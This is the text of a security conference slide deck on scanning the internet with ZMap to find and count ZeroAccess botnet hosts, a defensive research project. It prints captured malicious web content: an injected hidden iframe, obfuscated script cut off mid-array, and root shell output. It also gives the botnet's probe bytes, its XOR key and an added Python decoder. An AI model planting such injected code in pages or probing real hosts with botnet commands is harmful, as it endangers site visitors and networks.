Hunting Botnets with ZMap

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.


Page 1: Hunting Botnets with Zmap


Hunting Botnets with ZMap

Ricky Lawshae / 21 March 2014

Page 2: Hunting Botnets with Zmap


Who am I?

• Security Researcher at HP TippingPoint DVLabs

• At Rapid7 before that, and BreakingPoint before that…been doing this for a while now

• Specialize in network protocol analysis

• Breaker of things/voider of warranties

Page 3: Hunting Botnets with Zmap


What is the internet?

Page 4: Hunting Botnets with Zmap


The State of Scanning

• Internet Census 2012
  – Researcher compromised more than 400k devices
  – Created the Carna Botnet
  – Started sending various probes to every machine on the internet
  – Published the scan data

• Critical.io
  – Same idea of scanning the whole internet
  – Instead of having a 400k botnet, it was just HD Moore doing it himself
  – Data was not public at the time

Page 5: Hunting Botnets with Zmap


The State of Scanning

• Do-it-yourself
  – Growing number of internet-scale scanning tools (ZMap, Masscan, etc)
  – Arms race of sorts to see who can scan /0 the fastest

• “Scan the entire internet in X minutes!”

• ZMap
  – Created by a team at University of Michigan
  – Open-source (https://github.com/zmap/zmap)
  – Easy to use
    • zmap -M udp -p [port] -B 400M --probe-args=file:[payload_file]

Page 6: Hunting Botnets with Zmap


The State of Scanning

• Project Sonar
  – Started by Rapid7 in 2013
  – Community-driven scan data collection
  – Utilizes many different scan methods
  – Publicly available (https://scans.io/)

Page 7: Hunting Botnets with Zmap


The State of Scanning

• Get a better idea of what the internet is

• Take a proactive approach to difficult problems
  – Such as…

Page 8: Hunting Botnets with Zmap


Malware

• Largely unquantified problem
  – At least, not efficiently or accurately
  – Assume it’s bad, we just don’t know exactly how bad

• The current approach
  – Passive monitoring of “sensors”
  – Hits on IDS devices, etc
  – Extrapolate infection numbers from sample sets

• A new approach
  – Use internet scanning (i.e. ZMap) to look for compromised/malicious hosts
  – They tell you right then if they’re infected or not

Page 9: Hunting Botnets with Zmap


Using the Data We Have

• Searching through existing scan data shows a lot of awful out there
  – Exploit kit landing pages
  – Malicious javascript
  – Shells!

Page 10: Hunting Botnets with Zmap


Using the Data We Have [110.137.80.152]

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 09:07:26 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/html

<html><head><meta name="author" content="Kai Oswald Seidler"><meta http-equiv="refresh" content="0;url=/xampp/"></head><body bgcolor=#ffffff><!--5b1825--><iframe frameborder=0 height=1 width=1 scrolling=no src='http://gabranits.com/main.php?page=85deef298b2e1e90'> </iframe><!--/5b1825--></body></html>

Page 11: Hunting Botnets with Zmap


Using the Data We Have [108.60.3.182]

HTTP/1.1 200 OK
Date: Sat, 15 Dec 2012 20:20:49 GMT
Server: Apache
Last-Modified: Sat, 15 Dec 2012 07:43:52 GMT
Accept-Ranges: bytes
Content-Length: 2685
Connection: close
Content-Type: text/html

<html><body bgcolor="#000000"><!--393740--><script type="text/javascript" language="javascript" > try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=82;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,98,112,97,106,102,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,25,26,27,23,95,114,99,108,99,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,111,94,91,109,90,96,98,110,96,90,108,108,40,105,99,39,98,103,92,94,93,108,41,94,99,97,100,40,107,95,104,32,53,8,1,24,25,26,27,94,113,98,107,103,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,10

Page 12: Hunting Botnets with Zmap


Using the Data We Have [83.141.18.221]

(root@web21:/)
/bin/sh: line 1: GET: command not found
/bin/sh: line 2: \r: command not found

Page 13: Hunting Botnets with Zmap


Using the Data We Have

• Good to know, but we want to go deeper

• Sending generic requests won’t work for everything
  – UDP services only respond to requests they recognize
  – Targeted malware scanning would get better results faster

• Time to do our own scan!

Page 14: Hunting Botnets with Zmap


Scanning for Botnets

• A step-by-step guide
  – Write a ZMap probe that elicits a response from infected hosts and/or C&C servers
  – Find some bandwidth
    • Dedicated servers with fat, unmetered pipes work nicely
    • My current setup has a 500Mbps unlimited line and a TB of storage
  – Send your probe to the entire internet
  – Examine the responses
    • Remove any false positives you got back
    • You can automate most of this if you know what you’re looking for
  – Respond to abuse complaints

Page 15: Hunting Botnets with Zmap


Scanning for Botnets

• What makes a good target
  – UDP is easier than TCP
    • Less overhead
    • Less risk of false positive (well…we’ll get to that)
  – Small range of listening ports
    • Zeus picks randomly from a 10000 port range…It adds up quick

• What doesn’t make a good target
  – Malware that communicates over HTTP
    • Lots of results == lots of post-processing
    • ZMap doesn’t handle this well

Page 16: Hunting Botnets with Zmap


Proof of Concept

Page 17: Hunting Botnets with Zmap


Proof of Concept: Zero Access

• Botnet used mostly for click-fraud, some bitcoin mining

• Been in the news a lot lately
  – Microsoft take-down attempt on Dec 5th
  – And Symantec last Sept

• P2P botnet where all infected hosts can talk to each other
  – “Super peers” are internet-facing machines
  – Hard to track down actual C&C servers, since control is decentralized
  – Hard to completely shut down

Page 18: Hunting Botnets with Zmap


Proof of Concept: Zero Access

• It makes a good proof of concept for many reasons
  – Bot communication over both TCP and UDP
  – Small command payloads
    • 16 bytes for the one I used
  – Small range of hardcoded ports
    • 16461, 16464, 16465, 16470, 16471
  – Known to be currently active
    • Bound to get at least some results

Page 19: Hunting Botnets with Zmap


Proof of Concept: Zero Access

• GetL command
  – Get list of peers that an infected host is able to communicate with
  – 16 byte payload
    • 4 byte CRC checksum
    • 4 byte command string (“getL”)
    • 4 byte unknown (Sequence number or packet ID? Anyways, it’s 0)
    • 4 byte unique ID
  – Gets “encrypted” using a ROL/XOR algorithm
    • 4 byte key ^ 1st 4 bytes of data
    • Rotate key bits left one place, and XOR rotated key with next 4 data bytes
    • Repeat
  – Hardcoded key == “ftp2”

Page 20: Hunting Botnets with Zmap


Proof of Concept: Zero Access

\xE7\x98\xED\x03\x28\x94\x8D\xAB\xC9\xC0\xD1\x99\x13\xC3\xC6\xF9
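An added worked example, not from the slides: a Python decoder for the 16-byte getL probe described on the previous slide, checked against the probe bytes shown above, plus the HTTP false-positive check the deck later motivates with the Rimon block page. The key is taken as the 32-bit constant 0x66747032 (“ftp2”) and dwords are handled little-endian; that byte order is an assumption inferred from the slide’s bytes, under which the third dword decodes to 0 as the slide states.

```python
import struct
from typing import Optional

# Key from the slides: "ftp2" taken as the 32-bit constant 0x66747032.
# Assumption (inferred from the slide's probe bytes): dwords are handled
# little-endian and the key is rotated left one bit per dword.
KEY = 0x66747032
GETL_CMD = int.from_bytes(b"getL", "big")  # 0x6765744C after decoding


def rol32(x: int, n: int) -> int:
    """Rotate a 32-bit value left by n bits."""
    n &= 31
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def rol_xor(data: bytes) -> bytes:
    """XOR each dword with the key, rotating the key left one bit per dword.
    XOR is its own inverse, so the same routine encodes and decodes."""
    if len(data) % 4:
        raise ValueError("payload length must be a multiple of 4")
    key, out = KEY, bytearray()
    for (dword,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", dword ^ key)
        key = rol32(key, 1)
    return bytes(out)


def parse_getl(packet: bytes) -> Optional[dict]:
    """Decode a 16-byte getL probe into its four fields; None if it is not one.
    The CRC field is reported, not validated: the slides do not say what it covers."""
    if len(packet) != 16:
        return None
    crc, cmd, unknown, uid = struct.unpack("<4I", rol_xor(packet))
    if cmd != GETL_CMD or unknown != 0:
        return None
    return {"crc": crc, "cmd": cmd.to_bytes(4, "big").decode(),
            "unknown": unknown, "uid": uid}


def is_http_false_positive(response: bytes) -> bool:
    """Slide 26: most false positives were HTTP replies, e.g. the Rimon block page."""
    return response.startswith(b"HTTP/")


# The 16 probe bytes shown on the slide, and a constructed sample of the
# Rimon block response (headers taken from slide 26).
SLIDE_PROBE = bytes.fromhex("E798ED0328948DABC9C0D19913C3C6F9")
RIMON_SAMPLE = b"HTTP/1.0 200 OK\r\nConnection: keep-alive\r\nRimon: RWC_BLOCK\r\n"

if __name__ == "__main__":
    print(parse_getl(SLIDE_PROBE))
    print(is_http_false_positive(RIMON_SAMPLE))
```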

Page 21: Hunting Botnets with Zmap


Sweet, sweet data

Page 22: Hunting Botnets with Zmap


Infection by the Numbers

• Scan date: 4 December 2013

• Scan duration: 15 hours

• Total unique hosts found: 10500

• Infected hosts (by port)
  – 16461: 239
  – 16464: 3503
  – 16465: 1285
  – 16470: 2192
  – 16471: 4230

• Scan date: 24 January 2014

• Scan duration: 15 hours

• Total unique hosts found: 7873

• Infected hosts (by port)
  – 16461: 176
  – 16464: 3732
  – 16465: 1238
  – 16470: 1798
  – 16471: 2713

Page 23: Hunting Botnets with Zmap


Second Scan by Country

• Infection found across 109 countries

• US accounts for 34% of infected hosts
  – Seems like a lot until you realize that US owns 34% of all IPv4 addresses [1]

• Japan is distant 2nd at 9%

• Switzerland has 5 (~0.065%)

• Venezuela seems a little high…

[1] http://www.ip2location.com/reports/internet-ip-address-2012-report

Page 24: Hunting Botnets with Zmap


A quick aside to discuss a couple of anomalies

Page 25: Hunting Botnets with Zmap


Where is China?

• 56th place in the list of infected countries
  – 11 infected hosts
  – 0.1% of total

• Consensus is that this is probably Great Firewall of China related

• If we count Hong Kong as part of China, the number goes up quite a bit
  – Hong Kong had 54 infected (about 5 times more than all of China)
  – Bumps China up to almost 1%!

Page 26: Hunting Botnets with Zmap


The Curious Case of Israel

• Before removing false positives, Israel showed WAY higher than expected infected hosts
  – 3372 “infected” in first scan (23% of total). Was it being targeted?
  – Only 80 of those were legitimate results

• Examining the false positives among the Israeli IP addresses showed most were HTTP responses

• Turns out http://internet-rimon.com/ (major Israeli ISP) does some intense nanny filtering

HTTP/1.0 200 OK
Connection: keep-alive
Rimon: RWC_BLOCK
Content-type: text/html
Refresh: 15
Date: Wed, 04 Dec 2013 06:31:28 GMT
Expire: Mon, 02 Dec 2013 21:11:28
Pragma: no-cache
Cache-Control: no-cache
Server: lighttpd/1.4.19
Content-Length: 103

<html><head></head><body><center><b>You are not recognized in the system !!!</b></center></body></html>

Page 27: Hunting Botnets with Zmap


Back to the Data

Page 28: Hunting Botnets with Zmap


Trouble in South America?

Everywhere else is getting better, but S. America seems to be getting much worse (CL +21, AR +61, VE +80, etc). Politics? Impending World Cup? Impossible to guess. May even be coincidence.

Page 29: Hunting Botnets with Zmap


Second Scan by ISP

• No big surprises here
  – Most ISP’s in top 10 are based in countries in top 10
  – Though the order is somewhat interesting

• Should be noted that Microsoft still has 16 infected hosts out there…
  – Funny in light of the fact that they were going so hard against Zero Access recently

• Couple from Amazon, godaddy, etc

Top 10 Infected ISPs (chart, second scan; infected hosts per ISP):

• Comcast Cable: 725
• Time Warner: 470
• Charter Comm: 254
• RCS & RDS: 228
• Chunghwa: 205
• CanTV: 196
• Cox Comm: 172
• Optimum Online: 140
• Open Comp Net: 130
• Telecom Italia: 91

Page 30: Hunting Botnets with Zmap


The Takeaway

Page 31: Hunting Botnets with Zmap


What We Learned

• It works!
  – Well…for specific types of malware
  – Stronger and weaker than old approach in certain aspects
  – Only get part of the picture
  – Feasibility of HTTP-based C&C hunting has yet to be determined

• Zero Access is still rampant
  – Dumb guess at number of peers based only on super-peers means as much as 2 million infected
  – Reality is probably lower, could decode responses to find out…

• China and Israel both have pretty good firewalls apparently

Page 32: Hunting Botnets with Zmap


Where do we go next?

• Decode responses I got from this scan to pull out peer lists
  – Get a more complete picture of the infection
  – Though just knowing all the super-peers is still very useful

• Going after C&C
  – Currently assessing potential targets
  – Would like to avoid having to process HTTP responses

• Get a regularly scheduled cycle of scans going
  – More probes!
  – Could have monthly or even weekly updates on multiple botnets

Page 33: Hunting Botnets with Zmap


What else could you do with this?

• Track infection rates over time
  – More data points == better conclusions
  – See if it’s getting better or worse
  – Watch the distribution to other countries

• Watch take-down attempts as they happen
  – Measure effectiveness

• Scan your own internal networks
  – Can scan an entire class A in minutes
  – You should already be scanning your own networks anyway

Page 34: Hunting Botnets with Zmap


References

https://zmap.io/ [ZMap open-source scanner project]

http://en.wikipedia.org/wiki/ZeroAccess_botnet [Zero Access entry on Wikipedia]

https://twitter.com/HeadlessZeke [I rarely say anything valuable, but I am responsive]


Page 35: Hunting Botnets with Zmap


Thank you